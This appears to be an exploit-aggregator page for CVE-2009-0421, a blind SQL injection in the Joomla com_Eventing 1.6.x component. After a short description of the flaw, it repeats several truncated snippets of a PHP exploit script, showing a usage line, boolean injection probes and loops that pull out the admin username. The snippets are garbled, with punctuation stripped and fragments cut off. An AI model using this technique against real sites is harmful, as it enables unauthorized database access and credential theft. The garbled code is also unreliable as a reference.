CVE-2009-0421

CVE-2009-0421 : A SQL injection vulnerability affects the Joomla! Eventing component (com_eventing) 1.6.x. The issue arises from improper sanitization of the catid parameter in index.php, allowing remote, unauthenticated attackers to inject SQL commands. CVSS metrics indicate a network-exposed, l...

Joomla com_Eventing 1.6.x Blind SQL Injection Exploit

No description provided by source. ?php iniset"maxexecutiontime",0; printr' Joomla comEventing Blind SQL Injection Exploit === Cyb3R-1st === [email protected] == Writing by Stack - thx m8 - == usage : php file.php "http://site.me/index.php?option=comeventing&catid=1" '; if $argc 1 $url =...

Joomla! Component com_Eventing 1.6.x - Blind SQL Injection

Joomla! Component comEventing 1.6.x - Blind SQL Injection 1 $url = $argv1; $r = strlenfilegetcontents$url."+and+1=1--"; echo "\nExploiting:\n"; $w = strlenfilegetcontents$url."+and+1=0--"; $t = abs100-$w/$r100; echo "Username: "; for $i=1; $i $t-1 $count = $i; $i = 30; for $j = 1; $j $t-1 $laenge...

Joomla! Component com_Eventing 1.6.x - Blind SQL Injection

1 $url = $argv1; $r = strlenfilegetcontents$url."+and+1=1--"; echo "\nExploiting:\n"; $w = strlenfilegetcontents$url."+and+1=0--"; $t = abs100-$w/$r100; echo "Username: "; for $i=1; $i $t-1 $count = $i; $i = 30; for $j = 1; $j $t-1 $laenge =...

Joomla com_Eventing 1.6.x Blind SQL Injection Exploit

Exploit for unknown platform in category web applications ===================================================== Joomla comEventing 1.6.x Blind SQL Injection Exploit ===================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1...